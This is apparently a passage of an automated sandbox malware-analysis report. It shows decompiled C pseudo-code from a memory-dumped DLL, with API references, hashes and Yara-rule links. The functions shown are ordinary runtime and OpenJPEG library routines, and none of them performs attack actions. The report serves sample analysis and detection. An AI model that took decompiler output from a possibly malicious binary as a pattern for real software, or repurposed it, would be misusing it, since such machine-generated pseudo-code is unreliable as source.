						if(_t95 > _t63) {
							goto L37;
						}
						_t64 = E6EE44F21(_a8, _a12, _t71, _t90, _a24, _t63, 0, 0, 0);
						_t95 = _t64;
						if(_t64 != 0) {
							goto L38;
						}
						goto L37;
					}
					if(_t49 > 0x400) {
						_t71 = E6EE44756(_t49);
						if(_t71 == 0) {
							L13:
							_t85 = _v12;
							goto L15;
						}
						 *_t71 = 0xdddd;
						L12:
						_t71 = _t71 + 8;
						goto L13;
					}
					E6EE37060();
					_t71 = _t98;
					if(_t71 == 0) {
						goto L13;
					}
					 *_t71 = 0xcccc;
					goto L12;
				}
			}

APIs

__freea.LIBCMT ref: 6EE4C636

Part of subcall function 6EE44756: RtlAllocateHeap.NTDLL(00000000,00000000,?,?,6EE3612D,00000000,?,6EDB211C,00000000,?,6EDB1379,00000000), ref: 6EE44788

__freea.LIBCMT ref: 6EE4C63F
__freea.LIBCMT ref: 6EE4C662

Strings

n, xrefs: 6EE4C492

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: __freea$AllocateHeap
String ID: n
API String ID: 2243444508-2987474338
Opcode ID: 61b8a88787c809648a42e77dc3f5930f8b83031f25a8eb8d211e7752fe5120de
Instruction ID: dd9b5ad26587472f5fa94ff8c6bfc593e3587de7139b21a5f38bd3d8ea9a96dd
Opcode Fuzzy Hash: 61b8a88787c809648a42e77dc3f5930f8b83031f25a8eb8d211e7752fe5120de
Instruction Fuzzy Hash: B451B172710217EFFB108EE4FC40EAB36A9EB44758F314569FD149B250E735DC1686A0

Uniqueness

Uniqueness Score: -1.00%

Function 6EDB26F0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E6EDB26F0(intOrPtr* __ecx, void* __eflags) {
				char _v8;
				intOrPtr _v16;
				char _v17;
				char _v18;
				intOrPtr* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v40;
				char _v64;
				char _v88;
				intOrPtr _t67;
				intOrPtr _t73;

				_push(0xffffffff);
				_push(0x6ee56075);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t73;
				_v24 = __ecx;
				E6EDB18A0( &_v64, __eflags, "a");
				_v8 = 0;
				_t67 = _v24;
				_t78 =  *_v24 + 1 -  *((intOrPtr*)(_t67 + 4));
				if( *_v24 + 1 >  *((intOrPtr*)(_t67 + 4))) {
					E6EDB1B70( &_v40, "#11");
					E6EE37B80( &_v40, 0x6ee67f10);
				}
				_v28 = E6EDB2A10(_v24, _t78,  &_v88,  *((intOrPtr*)(_v24 + 4)));
				_v32 = _v28;
				_v8 = 1;
				E6EDB1FB0( &_v64, _v32);
				_v8 = 0;
				E6EDB1D80( &_v88);
				_v17 =  *((intOrPtr*)( *((intOrPtr*)(_v24 + 8)) +  *_v24));
				 *_v24 =  *_v24 + 1;
				_push(E6EDB2660( &_v64));
				E6EDB1340(_t45);
				_v18 = _v17;
				_v8 = 0xffffffff;
				E6EDB1D80( &_v64);
				 *[fs:0x0] = _v16;
				return _v18;
			}

APIs

std::locale::facet::facet.LIBCPMTD ref: 6EDB273A

Part of subcall function 6EE37B80: RaiseException.KERNEL32(E06D7363,00000001,00000003,6EE370C5,?,?,?,6EE370C5,?,6EE67E9C), ref: 6EE37BE0

task.LIBCPMTD ref: 6EDB2780
task.LIBCPMTD ref: 6EDB27C4

Strings

#11, xrefs: 6EDB2732

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: task$ExceptionRaisestd::locale::facet::facet
String ID: #11
API String ID: 2223519425-1388914211
Opcode ID: 971bda084fb56f48a570fca8adf5a63d17377a6625d40ac4e2f418245e19c679
Instruction ID: d9951d862475bb455f8baca6974b8e14c2ed3a22a57f03dd9c86f781605be60e
Opcode Fuzzy Hash: 971bda084fb56f48a570fca8adf5a63d17377a6625d40ac4e2f418245e19c679
Instruction Fuzzy Hash: BB311EB5D00149EFCB05DFD4D590AEEFBB8AF05314F248598D4527B390EB35AA05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6EDEDED0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E6EDEDED0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed int _t26;

				_v16 = E6EE3F9F9(__ebx, __edi, __esi, __eflags, "OPJ_NUM_THREADS");
				if(_v16 == 0 ||  *0x6ee67170() == 0) {
					return 0;
				} else {
					_v8 =  *0x6ee67174();
					_t22 = E6EE3E510(_v16, "ALL_CPUS");
					__eflags = _t22;
					if(_t22 != 0) {
						__eflags = _v8;
						if(_v8 == 0) {
							_v8 = 0x20;
						}
						_v12 = E6EE3F8EA(_v16, _v16);
						__eflags = _v12;
						if(_v12 >= 0) {
							__eflags = _v12 - _v8 << 1;
							if(_v12 > _v8 << 1) {
								_t26 = _v8 << 1;
								__eflags = _t26;
								_v12 = _t26;
							}
						} else {
							_v12 = 0;
						}
						return _v12;
					}
					return _v8;
				}
			}

APIs

_opj_has_thread_support@0.BCCW1XUJAH ref: 6EDEDEEC
_opj_get_num_cpus@0.BCCW1XUJAH ref: 6EDEDEFA

Strings

ALL_CPUS, xrefs: 6EDEDF03
OPJ_NUM_THREADS, xrefs: 6EDEDED6

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: _opj_get_num_cpus@0_opj_has_thread_support@0
String ID: ALL_CPUS$OPJ_NUM_THREADS
API String ID: 891234176-1994205374
Opcode ID: 38581c90c18b607df7c5ac59b578bd13c39a63185eb2f2814550e3497094cae1
Instruction ID: 371f43a93ef73d8a75f8c62f830c258da21c806b7e264c49a7f63c012d7cc6f1
Opcode Fuzzy Hash: 38581c90c18b607df7c5ac59b578bd13c39a63185eb2f2814550e3497094cae1
Instruction Fuzzy Hash: 481105B0D04208EBDB44DFF9D94878EBBB4AF80309F2085A9E815A6684EB749A45CF41

Uniqueness

Uniqueness Score: -1.00%

Function 6EE4591A, Relevance: 6.3, APIs: 4, Instructions: 320
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E6EE4591A(void* __edx, void* __fp0, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v32;
				signed int _v40;
				char _v48;
				intOrPtr _v56;
				char _v60;
				void* __ebx;
				void* __edi;
				signed char _t85;
				void* _t91;
				signed int _t95;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed int _t104;
				signed int _t105;
				void* _t106;
				signed int _t107;
				void* _t108;
				void* _t110;
				void* _t113;
				void* _t115;
				signed int _t117;
				signed int* _t118;
				void* _t121;
				signed int _t123;
				signed int _t129;
				signed int* _t130;
				signed int* _t133;
				signed int _t134;
				signed int _t137;
				signed int _t139;
				signed int _t141;
				signed int _t146;
				signed int _t147;
				signed int _t149;
				signed int _t150;
				void* _t154;
				unsigned int _t155;
				signed int _t162;
				void* _t163;
				signed int _t164;
				signed int* _t165;
				signed int _t168;
				signed int _t173;
				signed int _t174;
				signed int _t175;
				signed int _t177;
				signed int _t178;
				signed int _t179;
				void* _t181;
				void* _t188;

				_t188 = __fp0;
				_t163 = __edx;
				_t173 = _a24;
				if(_t173 < 0) {
					_t173 = 0;
				}
				_t177 = _a8;
				 *_t177 = 0;
				E6EE3B82D( &_v60, _t163, _t188, _a36);
				_t5 = _t173 + 0xb; // 0xb
				_t185 = _a12 - _t5;
				if(_a12 > _t5) {
					_t133 = _a4;
					_t139 = _t133[1];
					_t164 =  *_t133;
					__eflags = (_t139 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t139 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						__eflags = _t139;
						if(__eflags > 0) {
							L14:
							_t165 = _t177 + 1;
							_t85 = _a28 ^ 0x00000001;
							_v16 = 0x3ff;
							_v5 = _t85;
							_v40 = _t165;
							_v32 = ((_t85 & 0x000000ff) << 5) + 7;
							__eflags = _t139 & 0x7ff00000;
							_t91 = 0x30;
							if((_t139 & 0x7ff00000) != 0) {
								 *_t177 = 0x31;
								L19:
								_t141 = 0;
								__eflags = 0;
								L20:
								_t178 =  &(_t165[0]);
								_v12 = _t178;
								__eflags = _t173;
								if(_t173 != 0) {
									_t95 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v56 + 0x88))))));
								} else {
									_t95 = _t141;
								}
								 *_t165 = _t95;
								_t97 = _t133[1] & 0x000fffff;
								__eflags = _t97;
								_v24 = _t97;
								if(_t97 > 0) {
									L25:
									_t166 = _t141;
									_t142 = 0xf0000;
									_t98 = 0x30;
									_v12 = _t98;
									_v20 = _t141;
									_v24 = 0xf0000;
									do {
										__eflags = _t173;
										if(_t173 <= 0) {
											break;
										}
										_t121 = E6EE36230( *_t133 & _t166, _v12, _t133[1] & _t142 & 0x000fffff);
										_t154 = 0x30;
										_t123 = _t121 + _t154 & 0x0000ffff;
										__eflags = _t123 - 0x39;
										if(_t123 > 0x39) {
											_t123 = _t123 + _v32;
											__eflags = _t123;
										}
										_t155 = _v24;
										_t166 = (_t155 << 0x00000020 | _v20) >> 4;
										 *_t178 = _t123;
										_t178 = _t178 + 1;
										_t142 = _t155 >> 4;
										_t98 = _v12 - 4;
										_t173 = _t173 - 1;
										_v20 = (_t155 << 0x00000020 | _v20) >> 4;
										_v24 = _t155 >> 4;
										_v12 = _t98;
										__eflags = _t98;
									} while (_t98 >= 0);
									_v12 = _t178;
									__eflags = _t98;
									if(__eflags < 0) {
										goto L42;
									}
									_t117 = E6EE46135(__eflags, _t133, _t166, _t142, _t98, _a40);
									_t181 = _t181 + 0x14;
									__eflags = _t117;
									if(_t117 == 0) {
										goto L42;
									}
									_t118 = _t178 - 1;
									_t137 = 0x30;
									while(1) {
										_t149 =  *_t118;
										__eflags = _t149 - 0x66;
										if(_t149 == 0x66) {
											goto L35;
										}
										__eflags = _t149 - 0x46;
										if(_t149 != 0x46) {
											_t133 = _a4;
											__eflags = _t118 - _v40;
											if(_t118 == _v40) {
												_t54 = _t118 - 1;
												 *_t54 =  *(_t118 - 1) + 1;
												__eflags =  *_t54;
											} else {
												__eflags = _t149 - 0x39;
												if(_t149 != 0x39) {
													_t150 = _t149 + 1;
													__eflags = _t150;
												} else {
													_t150 = _v32 + 0x3a;
												}
												 *_t118 = _t150;
											}
											goto L42;
										}
										L35:
										 *_t118 = _t137;
										_t118 = _t118 - 1;
									}
								} else {
									__eflags =  *_t133 - _t141;
									if( *_t133 <= _t141) {
										L42:
										__eflags = _t173;
										if(_t173 > 0) {
											_push(_t173);
											_t115 = 0x30;
											_push(_t115);
											_push(_t178);
											E6EE38EC0(_t173);
											_t178 = _t178 + _t173;
											__eflags = _t178;
											_v12 = _t178;
										}
										_t99 = _v40;
										__eflags =  *_t99;
										if( *_t99 == 0) {
											_t178 = _t99;
											_v12 = _t178;
										}
										 *_t178 = (_v5 << 5) + 0x50;
										_t104 = E6EE36230( *_t133, 0x34, _t133[1]);
										_t179 = 0;
										_t105 = _v12;
										_t146 = (_t104 & 0x000007ff) - _v16;
										__eflags = _t146;
										asm("sbb esi, esi");
										_t168 = _t105 + 2;
										_v40 = _t168;
										if(__eflags < 0) {
											L50:
											_t146 =  ~_t146;
											asm("adc esi, 0x0");
											_t179 =  ~_t179;
											_t134 = 0x2d;
											goto L51;
										} else {
											if(__eflags > 0) {
												L49:
												_t134 = 0x2b;
												L51:
												 *(_t105 + 1) = _t134;
												_t174 = _t168;
												_t106 = 0x30;
												 *_t168 = _t106;
												_t107 = 0;
												__eflags = _t179;
												if(__eflags < 0) {
													L55:
													__eflags = _t174 - _t168;
													if(_t174 != _t168) {
														L59:
														_push(_t134);
														_push(_t107);
														_push(0x64);
														_push(_t179);
														_t108 = E6EE55B80();
														_t179 = _t134;
														_t134 = _t146;
														_v32 = _t168;
														_t168 = _v40;
														 *_t174 = _t108 + 0x30;
														_t174 = _t174 + 1;
														_t107 = 0;
														__eflags = 0;
														L60:
														__eflags = _t174 - _t168;
														if(_t174 != _t168) {
															L64:
															_push(_t134);
															_push(_t107);
															_push(0xa);
															_push(_t179);
															_push(_t146);
															_t110 = E6EE55B80();
															_v40 = _t168;
															 *_t174 = _t110 + 0x30;
															_t174 = _t174 + 1;
															_t107 = 0;
															__eflags = 0;
															L65:
															_t147 = _t146 + 0x30;
															__eflags = _t147;
															 *_t174 = _t147;
															 *(_t174 + 1) = _t107;
															_t175 = _t107;
															L66:
															if(_v48 != 0) {
																 *(_v60 + 0x350) =  *(_v60 + 0x350) & 0xfffffffd;
															}
															return _t175;
														}
														__eflags = _t179 - _t107;
														if(__eflags < 0) {
															goto L65;
														}
														if(__eflags > 0) {
															goto L64;
														}
														__eflags = _t146 - 0xa;
														if(_t146 < 0xa) {
															goto L65;
														}
														goto L64;
													}
													__eflags = _t179 - _t107;
													if(__eflags < 0) {
														goto L60;
													}
													if(__eflags > 0) {
														goto L59;
													}
													__eflags = _t146 - 0x64;
													if(_t146 < 0x64) {
														goto L60;
													}
													goto L59;
												}
												_t134 = 0x3e8;
												if(__eflags > 0) {
													L54:
													_push(_t134);
													_push(_t107);
													_push(_t134);
													_push(_t179);
													_t113 = E6EE55B80();
													_t179 = _t134;
													_t134 = _t146;
													_v32 = _t168;
													_t168 = _v40;
													 *_t168 = _t113 + 0x30;
													_t174 = _t168 + 1;
													_t107 = 0;
													__eflags = 0;
													goto L55;
												}
												__eflags = _t146 - 0x3e8;
												if(_t146 < 0x3e8) {
													goto L55;
												}
												goto L54;
											}
											__eflags = _t146;
											if(_t146 < 0) {
												goto L50;
											}
											goto L49;
										}
									}
									goto L25;
								}
							}
							 *_t177 = _t91;
							_t141 =  *_t133 | _t133[1] & 0x000fffff;
							__eflags = _t141;
							if(_t141 != 0) {
								_v16 = 0x3fe;
								goto L19;
							}
							_v16 = _t141;
							goto L20;
						}
						if(__eflags < 0) {
							L13:
							 *_t177 = 0x2d;
							_t177 = _t177 + 1;
							__eflags = _t177;
							_t139 = _t133[1];
							goto L14;
						}
						__eflags = _t164;
						if(_t164 >= 0) {
							goto L14;
						}
						goto L13;
					}
					_t175 = E6EE45C29(_t133, _t139, _t188, _t133, _t177, _a12, _a16, _a20, _t173, 0, _a32, 0, _a40);
					__eflags = _t175;
					if(_t175 == 0) {
						_t129 = E6EE55C60(_t177, 0x65);
						__eflags = _t129;
						if(_t129 != 0) {
							_t162 = ((_a28 ^ 0x00000001) << 5) + 0x50;
							__eflags = _t162;
							 *_t129 = _t162;
							 *((char*)(_t129 + 3)) = 0;
						}
						_t175 = 0;
					} else {
						 *_t177 = 0;
					}
					goto L66;
				}
				_t130 = E6EE42012(_t185);
				_t175 = 0x22;
				 *_t130 = _t175;
				E6EE3AC66();
				goto L66;
			}

APIs

_strrchr.LIBCMT ref: 6EE459A4

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: d0b5b9c402bf1ce14bc7a2c9a132b330dbfeb54a82b4b34cc28cc28fa88d0c0e
Instruction ID: 7fc4f4fa75270669a69c0ca123c2f57074980de7a137a72f5504dd129a15a139
Opcode Fuzzy Hash: d0b5b9c402bf1ce14bc7a2c9a132b330dbfeb54a82b4b34cc28cc28fa88d0c0e
Instruction Fuzzy Hash: 2EB14932924246DFEB01CFE8D890BEEBBF5EF45354F34456AE8449B341E234994ACB60

Uniqueness

Uniqueness Score: -1.00%

Function 6EE20800, Relevance: 6.1, APIs: 4, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E6EE20800(void* __edi, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr* _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _t106;
				intOrPtr _t110;
				signed int _t124;
				void* _t192;
				void* _t193;
				void* _t194;
				void* _t195;

				_t192 = __edi;
				_v16 = 0;
				_t106 = E6EE20490(1, 0x24);
				_t194 = _t193 + 8;
				_v16 = _t106;
				if(_v16 == 0) {
					L12:
					return _v16;
				}
				 *((intOrPtr*)(_v16 + 0x14)) = _a12;
				 *((intOrPtr*)(_v16 + 0x10)) = _a4;
				_t110 = E6EE20490( *((intOrPtr*)(_v16 + 0x10)), 0x34);
				_t195 = _t194 + 8;
				 *((intOrPtr*)(_v16 + 0x18)) = _t110;
				if( *((intOrPtr*)(_v16 + 0x18)) != 0) {
					_v12 = 0;
					while(_v12 < _a4) {
						_v8 = _v12 * 0x34 +  *((intOrPtr*)(_v16 + 0x18));
						 *_v8 =  *((intOrPtr*)(_a8 + _v12 * 0x24));
						 *((intOrPtr*)(_v8 + 4)) =  *((intOrPtr*)(_a8 + 4 + _v12 * 0x24));
						 *(_v8 + 8) =  *(_a8 + 8 + _v12 * 0x24);
						 *(_v8 + 0xc) =  *(_a8 + 0xc + _v12 * 0x24);
						 *((intOrPtr*)(_v8 + 0x10)) =  *((intOrPtr*)(_a8 + 0x10 + _v12 * 0x24));
						 *((intOrPtr*)(_v8 + 0x14)) =  *((intOrPtr*)(_a8 + 0x14 + _v12 * 0x24));
						 *((intOrPtr*)(_v8 + 0x18)) =  *((intOrPtr*)(_a8 + 0x18 + _v12 * 0x24));
						 *((intOrPtr*)(_v8 + 0x1c)) =  *((intOrPtr*)(_a8 + 0x1c + _v12 * 0x24));
						_t124 = _a8;
						 *((intOrPtr*)(_v8 + 0x20)) =  *((intOrPtr*)(_t124 + 0x20 + _v12 * 0x24));
						if( *(_v8 + 0xc) == 0 ||  *(_v8 + 8) <= (_t124 | 0xffffffff) /  *(_v8 + 0xc) >> 2) {
							 *((intOrPtr*)(_v8 + 0x2c)) =  *0x6ee67164( *(_v8 + 8) *  *(_v8 + 0xc) << 2);
							if( *((intOrPtr*)(_v8 + 0x2c)) != 0) {
								E6EE38EC0(_t192,  *((intOrPtr*)(_v8 + 0x2c)), 0,  *(_v8 + 8) *  *(_v8 + 0xc) << 2);
								_t195 = _t195 + 0xc;
								_v12 = _v12 + 1;
								continue;
							}
							E6EE209C0(_v16);
							return 0;
						} else {
							E6EE209C0(_v16);
							return 0;
						}
					}
					goto L12;
				}
				E6EE209C0(_v16);
				return 0;
			}

APIs

_opj_image_destroy@4.BCCW1XUJAH(00000000), ref: 6EE2085C

Part of subcall function 6EE209C0: _opj_image_data_free@4.BCCW1XUJAH(?), ref: 6EE20A0F

_opj_image_destroy@4.BCCW1XUJAH(00000000,00000000), ref: 6EE2094D

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: _opj_image_destroy@4$_opj_image_data_free@4
String ID:
API String ID: 1102411199-0
Opcode ID: 48b8a36b8338adadc35b41712fc05f7be9f455fc454e20683f1cbedc531e9b2c
Instruction ID: 64a9645ac0a3e3762054e40f12f339f125851c7226148c88cb5a57dc7feb5fdd
Opcode Fuzzy Hash: 48b8a36b8338adadc35b41712fc05f7be9f455fc454e20683f1cbedc531e9b2c
Instruction Fuzzy Hash: FD617274A04209EFDB18CF94C5A199DB7B5FB88314F20C6AAD8155B395D731EE82CF80

Uniqueness

Uniqueness Score: -1.00%

Function 6EDCDDC0, Relevance: 6.1, APIs: 4, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E6EDCDDC0(intOrPtr* __ecx, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v16;
				intOrPtr* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v52;
				char _v76;
				char _v100;
				intOrPtr _t51;
				intOrPtr _t54;
				intOrPtr _t81;

				_push(0xffffffff);
				_push(0x6ee562b5);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t81;
				_v20 = __ecx;
				E6EDB18A0( &_v100, __eflags, 0x6ee572f4);
				_v8 = 0;
				E6EDB12B0(__eflags,  &_v76,  &_v100, 0x6ee572f8);
				_v8 = 1;
				E6EDB30F0( &_v76);
				_push(E6EDB2660( &_v76));
				E6EDB1340(_t45);
				_t86 = _a4;
				if(_a4 == 0) {
					_v32 =  *_v20;
					_v36 =  *_v20 +  *((intOrPtr*)(_v32 + 0x3c));
					_t51 =  *_v20 +  *((intOrPtr*)(_v36 + 0x28));
					__eflags = _t51;
					_v40 = _t51;
					_v44 = _v40;
					_v8 = 0;
					E6EDB1D80( &_v76);
					_v8 = 0xffffffff;
					E6EDB1D80( &_v100);
					_t54 = _v44;
				} else {
					E6EDB2C50( &_v52, _t86,  *_v20);
					_v24 = E6EDB2DF0( &_v52, _t86, _a4);
					_v28 = _v24;
					_v8 = 0;
					E6EDB1D80( &_v76);
					_v8 = 0xffffffff;
					E6EDB1D80( &_v100);
					_t54 = _v28;
				}
				 *[fs:0x0] = _v16;
				return _t54;
			}

APIs

task.LIBCPMTD ref: 6EDCDE54
task.LIBCPMTD ref: 6EDCDE63
task.LIBCPMTD ref: 6EDCDE9E
task.LIBCPMTD ref: 6EDCDEAD

Part of subcall function 6EDB2C50: task.LIBCPMTD ref: 6EDB2CC8
Part of subcall function 6EDB2C50: task.LIBCPMTD ref: 6EDB2CD7

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: task
String ID:
API String ID: 1384045349-0
Opcode ID: 4c56531c8b50951f3b3b9adf4aa8fe3b0cc9e49edecc980fe3dc411d1f50e82d
Instruction ID: d41e6aecde86b071fe232bcdede7ccfa6df2df9b3082c645a8066d6845e8687d
Opcode Fuzzy Hash: 4c56531c8b50951f3b3b9adf4aa8fe3b0cc9e49edecc980fe3dc411d1f50e82d
Instruction Fuzzy Hash: BA31EAB5D10209DFCB04DFD4C891AEEBBB8BF18314F144A59D41667390EB346A46CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 6EE444CA, Relevance: 6.1, APIs: 4, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E6EE444CA(void* __ecx, void* __edx, void* __fp0) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;
				void* _t72;

				_t72 = __fp0;
				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0x6ee77be0; // 0x6
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E6EE44DA2(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E6EE447A4(1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E6EE44DA2(__eflags,  *0x6ee77be0, _t51);
							if(__eflags != 0) {
								E6EE442CC(_t51, 0x6ee79584);
								E6EE4471C(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E6EE44DA2(__eflags,  *0x6ee77be0, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E6EE44DA2(0,  *0x6ee77be0, 0);
							_push(0);
							L9:
							E6EE4471C();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E6EE44D63(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0x6ee77be0; // 0x6
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E6EE3E6F4(_t39, _t43, _t49, _t53, _t60, _t72);
					asm("int3");
					_t5 =  *0x6ee77be0; // 0x6
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E6EE44DA2(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E6EE447A4(1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E6EE44DA2(__eflags,  *0x6ee77be0, _t60);
								if(__eflags != 0) {
									E6EE442CC(_t60, 0x6ee79584);
									E6EE4471C(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E6EE44DA2(__eflags,  *0x6ee77be0, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E6EE44DA2(__eflags,  *0x6ee77be0, _t20);
								_push(_t60);
								L25:
								E6EE4471C();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E6EE44D63(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0x6ee77be0; // 0x6
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E6EE3E6F4(_t39, _t43, _t49, _t53, _t60, _t72);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0x6ee77be0; // 0x6
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E6EE44DA2(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E6EE447A4(1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E6EE44DA2(__eflags,  *0x6ee77be0, _t54);
											if(__eflags != 0) {
												E6EE442CC(_t54, 0x6ee79584);
												E6EE4471C(0);
												goto L45;
											} else {
												_t40 = 0;
												E6EE44DA2(__eflags,  *0x6ee77be0, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E6EE44DA2(0,  *0x6ee77be0, 0);
											_push(0);
											L41:
											E6EE4471C();
											goto L36;
										}
									}
								} else {
									_t54 = E6EE44D63(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0x6ee77be0; // 0x6
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
